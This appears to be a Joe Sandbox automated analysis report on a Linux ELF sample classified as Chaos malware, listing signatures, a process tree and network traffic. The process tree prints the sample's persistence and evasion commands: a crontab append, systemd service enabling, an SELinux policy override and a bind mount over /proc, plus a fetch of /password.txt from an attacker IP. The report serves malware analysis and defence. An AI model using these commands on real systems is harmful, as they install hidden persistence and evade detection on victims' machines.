Create Interactive Tour

Linux Analysis Report
linux_386.elf

Overview

General Information

Sample name:linux_386.elf
Analysis ID:1644787
MD5:21ef8d4e6816e58f43beb0aee2422366
SHA1:0fcb6e72f604ab6e2afef0a40433b06a29c373bb
SHA256:e353d704ff45ff8513fa0ce6685d6dcb84cf7921f6173a935c9a312cde206631
Tags:elfuser-abuse_ch
Infos:

Detection

Chaos
Score:76
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Yara detected Chaos
Drops files in suspicious directories
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using cron
Sample tries to set files in /etc globally writable
Uses known network protocols on non-standard ports
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "kill" or "pkill" command typically used to terminate processes
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads CPU information from /sys indicative of miner or evasive malware
Reads the 'hosts' file potentially containing internal network hosts
Sample has stripped symbol table
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Sleeps for long times indicative of sandbox evasion
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension
Writes shell script files to disk

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1644787
Start date and time:2025-03-21 00:09:15 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 2s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:linux_386.elf
Detection:MAL
Classification:mal76.spre.troj.evad.linELF@0/14@2/0
  • Report size exceeded maximum capacity and may have missing behavior information.
  • VT rate limit hit for: http://156.225.31.175:808/password.txt
Command:/tmp/linux_386.elf
PID:6228
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • linux_386.elf (PID: 6228, Parent: 6143, MD5: 21ef8d4e6816e58f43beb0aee2422366) Arguments: /tmp/linux_386.elf
    • bash (PID: 6233, Parent: 6228, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c /etc/32678&
      • bash New Fork (PID: 6241, Parent: 6233)
      • 32678 (PID: 6241, Parent: 1860, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/32678
        • 32678 New Fork (PID: 6250, Parent: 6241)
        • sleep (PID: 6250, Parent: 6241, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
    • service (PID: 6234, Parent: 6228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start
      • service New Fork (PID: 6236, Parent: 6234)
      • basename (PID: 6236, Parent: 6234, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 6249, Parent: 6234)
      • basename (PID: 6249, Parent: 6234, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 6251, Parent: 6234)
      • systemctl (PID: 6251, Parent: 6234, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
      • service New Fork (PID: 6255, Parent: 6234)
        • service New Fork (PID: 6256, Parent: 6255)
        • systemctl (PID: 6256, Parent: 6255, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
        • service New Fork (PID: 6257, Parent: 6255)
        • sed (PID: 6257, Parent: 6255, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    • systemctl (PID: 6234, Parent: 1860, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
    • linux_386.elf (PID: 6235, Parent: 6228, MD5: 21ef8d4e6816e58f43beb0aee2422366) Arguments: /tmp/linux_386.elf
      • update-rc.d (PID: 6248, Parent: 6235, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d linux_kill defaults
        • systemctl (PID: 6252, Parent: 6248, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • bash (PID: 6282, Parent: 6235, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable linux.service;systemctl start linux.service;journalctl -xe --no-pager"
        • bash New Fork (PID: 6283, Parent: 6282)
        • systemctl (PID: 6283, Parent: 6282, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
        • bash New Fork (PID: 6289, Parent: 6282)
        • systemctl (PID: 6289, Parent: 6282, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable linux.service
        • bash New Fork (PID: 6295, Parent: 6282)
        • systemctl (PID: 6295, Parent: 6282, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start linux.service
        • bash New Fork (PID: 6362, Parent: 6282)
        • journalctl (PID: 6362, Parent: 6282, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: journalctl -xe --no-pager
      • bash (PID: 6377, Parent: 6235, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;ausearch -c 'System.img.conf' --raw | audit2allow -M my-Systemimgconf;semodule -X 300 -i my-Systemimgconf.pp"
        • bash New Fork (PID: 6378, Parent: 6377)
        • bash New Fork (PID: 6379, Parent: 6377)
        • bash New Fork (PID: 6380, Parent: 6377)
      • bash (PID: 6385, Parent: 6235, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash -c "echo \"*/1 * * * * root /.img \" >> /etc/crontab"
      • renice (PID: 6386, Parent: 6235, MD5: 3686c936ed1df483498266a36871cb5b) Arguments: renice -20 6235
      • mount (PID: 6387, Parent: 6235, MD5: 92b20aa8b155ecd3ba9414aa477ef565) Arguments: mount -o bind /tmp/ /proc/6235
      • service (PID: 6410, Parent: 6235, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service cron start
        • service New Fork (PID: 6411, Parent: 6410)
        • basename (PID: 6411, Parent: 6410, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 6412, Parent: 6410)
        • basename (PID: 6412, Parent: 6410, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 6413, Parent: 6410)
        • systemctl (PID: 6413, Parent: 6410, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
        • service New Fork (PID: 6427, Parent: 6410)
          • service New Fork (PID: 6428, Parent: 6427)
          • systemctl (PID: 6428, Parent: 6427, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
          • service New Fork (PID: 6429, Parent: 6427)
          • sed (PID: 6429, Parent: 6427, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
      • systemctl (PID: 6410, Parent: 6235, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start cron.service
      • systemctl (PID: 6441, Parent: 6235, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
  • systemd New Fork (PID: 6268, Parent: 6267)
  • snapd-env-generator (PID: 6268, Parent: 6267, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6287, Parent: 6286)
  • snapd-env-generator (PID: 6287, Parent: 6286, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6293, Parent: 6292)
  • snapd-env-generator (PID: 6293, Parent: 6292, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6297, Parent: 1)
  • System.img.config (PID: 6297, Parent: 1, MD5: 21ef8d4e6816e58f43beb0aee2422366) Arguments: /boot/System.img.config
    • pkill (PID: 6311, Parent: 6297, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 32678
    • sh (PID: 6353, Parent: 6297, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /etc/32678&
      • sh New Fork (PID: 6356, Parent: 6353)
      • 32678 (PID: 6356, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/32678
        • 32678 New Fork (PID: 6367, Parent: 6356)
        • sleep (PID: 6367, Parent: 6356, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
        • 32678 New Fork (PID: 6490, Parent: 6356)
        • id.services.conf (PID: 6490, Parent: 6356, MD5: 21ef8d4e6816e58f43beb0aee2422366) Arguments: /etc/id.services.conf
          • pkill (PID: 6494, Parent: 6490, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 32678
          • sh (PID: 6495, Parent: 6490, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /etc/32678&
            • sh New Fork (PID: 6497, Parent: 6495)
            • 32678 (PID: 6497, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/32678
              • 32678 New Fork (PID: 6510, Parent: 6497)
              • sleep (PID: 6510, Parent: 6497, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
          • service (PID: 6496, Parent: 6490, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start
            • service New Fork (PID: 6506, Parent: 6496)
            • basename (PID: 6506, Parent: 6496, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 6511, Parent: 6496)
            • basename (PID: 6511, Parent: 6496, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 6512, Parent: 6496)
            • systemctl (PID: 6512, Parent: 6496, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 6513, Parent: 6496)
              • service New Fork (PID: 6514, Parent: 6513)
              • systemctl (PID: 6514, Parent: 6513, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 6515, Parent: 6513)
              • sed (PID: 6515, Parent: 6513, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
          • systemctl (PID: 6496, Parent: 1, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
          • id.services.conf (PID: 6498, Parent: 6490, MD5: 21ef8d4e6816e58f43beb0aee2422366) Arguments: /etc/id.services.conf
    • service (PID: 6354, Parent: 6297, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start
      • service New Fork (PID: 6366, Parent: 6354)
      • basename (PID: 6366, Parent: 6354, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 6368, Parent: 6354)
      • basename (PID: 6368, Parent: 6354, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 6369, Parent: 6354)
      • systemctl (PID: 6369, Parent: 6354, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
      • service New Fork (PID: 6372, Parent: 6354)
        • service New Fork (PID: 6373, Parent: 6372)
        • systemctl (PID: 6373, Parent: 6372, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
        • service New Fork (PID: 6374, Parent: 6372)
        • sed (PID: 6374, Parent: 6372, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    • systemctl (PID: 6354, Parent: 1, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
    • System.img.config (PID: 6357, Parent: 6297, MD5: 21ef8d4e6816e58f43beb0aee2422366) Arguments: /boot/System.img.config
  • sshd New Fork (PID: 6355, Parent: 936)
  • sshd (PID: 6355, Parent: 936, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
  • udisksd New Fork (PID: 6398, Parent: 799)
  • dumpe2fs (PID: 6398, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 6430, Parent: 1)
  • cron (PID: 6430, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
    • cron New Fork (PID: 6455, Parent: 6430)
      • cron New Fork (PID: 6461, Parent: 6455)
      • sh (PID: 6461, Parent: 6455, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.img "
        • sh New Fork (PID: 6462, Parent: 6461)
  • systemd New Fork (PID: 6480, Parent: 1)
  • cron (PID: 6480, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
ChaosMulti-functional malware written in Go, targeting both Linux and Windows, evolved from elf.kaiji.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.chaos
SourceRuleDescriptionAuthorStrings
linux_386.elfJoeSecurity_ChaosGoYara detected ChaosJoe Security
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: linux_386.elfVirustotal: Detection: 52%Perma Link
    Source: linux_386.elfReversingLabs: Detection: 52%
    Source: /usr/bin/pkill (PID: 6311)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pkill (PID: 6494)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior

    Networking

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 808 -> 35262
    Source: unknownNetwork traffic detected: HTTP traffic on port 35266 -> 808
    Source: unknownNetwork traffic detected: HTTP traffic on port 808 -> 35266
    Source: global trafficTCP traffic: 192.168.2.23:35262 -> 156.225.31.175:808
    Source: /tmp/linux_386.elf (PID: 6235)Reads hosts file: /etc/hostsJump to behavior
    Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
    Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
    Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: unknownTCP traffic detected without corresponding DNS query: 156.225.31.175
    Source: global trafficHTTP traffic detected: GET /password.txt HTTP/1.1Host: 156.225.31.175:808User-Agent: Go-http-client/1.1Accept-Encoding: gzip
    Source: linux_386.elfString found in binary or memory: http2: Transport conn %p received error from processing frame %v: %vhttp2: Transport received unsolicited DATA frame; closing connectionhttp: message cannot contain multiple Content-Length headers; got %qpadding bytes must all be zeros unless AllowIllegalWrites is enabledreflect: reflect.Value.UnsafePointer on an invalid notinheap pointerhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)tls: handshake message of length %d bytes exceeds maximum of %d bytestls: peer doesn't support the certificate custom signature algorithmsbytes.Buffer: UnreadByte: previous operation was not a successful readcannot convert slice with length %y to pointer to array with length %xgot %s for stream %d; expected CONTINUATION following %s for stream %dx509: PKCS#8 wrapping contained private key with unknown algorithm: %vx509: certificate relies on legacy Common Name field, use SANs insteadMozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)Sogou Pic Spider/3.0(+http://www.sogou.com/docs/help/webmasters.htm#07)Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)dynamic table size update MUST occur at the beginning of a header blockssh: no common algorithm for %s; client offered: %v, server offered: %vtls: peer doesn't support any of the certificate's signature algorithmstoo many concurrent operations on a single file or socket (max 1048575)x509: issuer has name constraints but leaf doesn't have a SAN extensionMozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)tls: server's certificate contains an unsupported type of public key: %Ttls: received unexpected handshake message of type %T when waiting for %T91289437fa036b34da55d57af6192768c27bd433fa012169d626d934e0051b24dd67dd3cf49d7cc827bc012d259d7ac226e70829239d7ac226e7082968de60d520eb433722c07fd236f6crypto/elliptic: internal error: Unmarshal rejected a valid point encodingmalformed response from server: malformed non-numeric status pseudo headernet/http: server replied with more than declared Content-Length; truncatedtls: certificate RSA key size too small for supported signature algorithmsUnsolicited response received on idle HTTP channel starting with %q; err=%vtls: internal error: attempted to read record with pending application datatls: failed to send closeNotify alert (but connection was closed anyway): %wtls: server certificate contains incorrect key type for selected ciphersuite((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})(\.((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})){3}MapIter.Next called on an iterator that does not have an associated map Valuecrypto/tls: ExportKeyingMaterial is unavailable when renegotiation is enabled115792089210356248762697446949407573529996955224135760342422259061068512044369115792089210356248762697446949407573530086143415290314195533631308867097853951ssh: internal error: algorithmSignerWrapper invoked with non-default algorithmssh: unable to authenticate, attempted methods %v, no supported methods remainx509: signature check attempt
    Source: linux_386.elfString found in binary or memory: http: RoundTripper implementation (%T) returned a nil *Response with a nil errortls: either ServerName or InsecureSkipVerify must be specified in the tls.Configx509: invalid signature: parent certificate cannot sign this kind of certificaterefusing to use HTTP_PROXY value in CGI environment; see golang.org/s/cgihttpproxyx509: a root or intermediate certificate is not authorized to sign for this name: (possibly because of %q while trying to verify candidate authority certificate %q)Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)x509: issuer has name constraints but leaf contains unknown or unconstrained name: tls: downgrade attempt detected, possibly due to a MitM attack or a broken middleboxx509: signature algorithm specifies an %s public key, but have public key of type %Treflect.Value.Interface: cannot return value obtained from unexported field or methodx509: failed to parse private key (use ParseECPrivateKey instead for this key format)Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/;)reflect: New of type that may not be allocated in heap (possibly undefined cgo C type)x509: a root or intermediate certificate is not authorized for an extended key usage: fxfzUc6gtMGc/i26ld3KydGKy1k7QqyMMyxjbU1Rlk+F9LQxnaTeCHGHsDUpaBeOWDeY6l+2kHlB7EWTLcGwfg==whv+Kf1cEtOXzr+zuvmef2as0WfbUDm8l2LMWBMel10NDnbShg9CsMUt327VJhOTbXLoPYJVTKy8MBPCVwoT8A==x509: failed to parse private key (use ParsePKCS1PrivateKey instead for this key format)x509: failed to parse private key (use ParsePKCS8PrivateKey instead for this key format)Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)http2: server sent GOAWAY and closed the connection; LastStreamID=%v, ErrCode=%v, debug=%qapplication/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5tls: handshake hash for a client certificate requested after discarding the handshake buffertls: unsupported certificate: private key is *ed25519.PrivateKey, expected ed25519.PrivateKey3617de4a96262c6f5d9e98bf9292dc29f8f41dbd289a147ce9da3113b5f0b8c00a60b1ce1d7e819d7a431d7c90ea0e5faa87ca22be8b05378eb1c71ef320ad746e1d3b628ba79b9859f741e082542a385502f25dbf55296c3a545e3872760ab7b3312fa7e23ee7e4988e056be3f82d19181d9c6efe8141120314088f5013875ac656398d8a2ed19d2a85c8edd3ec2aefhttp: RoundTripper implementation (%T) returned a *Response with content length %d but a nil BodyNoClientCertRequestClientCertRequireAnyClientCertVerifyClientCertIfGivenRequireAndVerifyClientCertcipher: the nonce can't have zero length, or the security of the key will be immediately compromised1.0.3<<RMS>> equals www.yahoo.com (Yahoo)
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: linux_386.elfString found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)x509:
    Source: linux_386.elfString found in binary or memory: http://search.msn.com/msnbot.htm
    Source: linux_386.elfString found in binary or memory: http://www.baidu.com/search/spider.html)
    Source: linux_386.elfString found in binary or memory: http://www.baidu.com/search/spider.html)000102030405060708091011121314151617181920212223242526272829
    Source: linux_386.elfString found in binary or memory: http://www.baidu.com/search/spider.html)Mozilla/5.0
    Source: linux_386.elfString found in binary or memory: http://www.baidu.com/search/spider.html)http2:
    Source: linux_386.elfString found in binary or memory: http://www.entireweb.com/about/search_tech/speedy_spider/)text/html
    Source: linux_386.elfString found in binary or memory: http://www.google.com/mobile/adsbot.html)
    Source: linux_386.elfString found in binary or memory: http://www.haosou.com/help/help_3_2.htmlMozilla/5.0
    Source: linux_386.elfString found in binary or memory: http://www.huaweisymantec.com/cn/IRL/spider)Mozilla/5.0
    Source: linux_386.elfString found in binary or memory: http://www.youdao.com/help/webmaster/spider/;)reflect:
    Source: linux_386.elfString found in binary or memory: http://yandex.com/bots)http:
    Source: linux_386.elfString found in binary or memory: https://search.yahoo.com/search?p=illegal
    Source: linux_386.elfString found in binary or memory: https://www.baidu.com/s?wd=insufficient
    Source: linux_386.elfString found in binary or memory: https://www.so.com/s?q=index
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: /usr/bin/pkill (PID: 6311)SIGKILL sent: pid: 6241, result: successfulJump to behavior
    Source: /usr/bin/pkill (PID: 6494)SIGKILL sent: pid: 6356, result: successfulJump to behavior
    Source: classification engineClassification label: mal76.spre.troj.evad.linELF@0/14@2/0
    Source: ELF file sectionSubmission: linux_386.elf

    Persistence and Installation Behavior

    barindex
    Source: /tmp/linux_386.elf (PID: 6235)File: /etc/profile.d/bash_config.shJump to behavior
    Source: /usr/bin/bash (PID: 6385)File: /etc/crontabJump to behavior
    Source: /tmp/linux_386.elf (PID: 6228)File: /etc/id.services.conf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6228)File: /etc/32678 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6235)File: /etc/profile.d/bash_config (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6235)File: /dev/.oldJump to behavior
    Source: /tmp/linux_386.elf (PID: 6235)File: /dev/.imgJump to behavior
    Source: /tmp/linux_386.elf (PID: 6235)File: /.imgJump to behavior
    Source: /etc/id.services.conf (PID: 6498)File: /dev/.old
    Source: /etc/id.services.conf (PID: 6498)File: /dev/.img
    Source: /boot/System.img.config (PID: 6357)File: /dev/.old
    Source: /boot/System.img.config (PID: 6357)File: /dev/.img
    Source: /boot/System.img.config (PID: 6357)Empty hidden file: /dev/.old
    Source: /boot/System.img.config (PID: 6357)Empty hidden file: /dev/.img
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/6350/statusJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/6350/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/6235/statusJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/6235/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/6356/statusJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/6356/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/1582/statusJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/1582/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/3088/statusJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/3088/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/230/statusJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/230/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/110/statusJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/110/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/231/statusJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/231/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/111/statusJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/111/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/232/statusJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/232/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/1579/statusJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/1579/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/112/statusJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/112/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/233/statusJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/233/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/1699/statusJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/1699/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/113/statusJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/113/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/234/statusJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/234/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/1335/statusJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/1335/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/1698/statusJump to behavior
    Source: /usr/bin/pkill (PID: 6494)File opened: /proc/1698/cmdlineJump to behavior
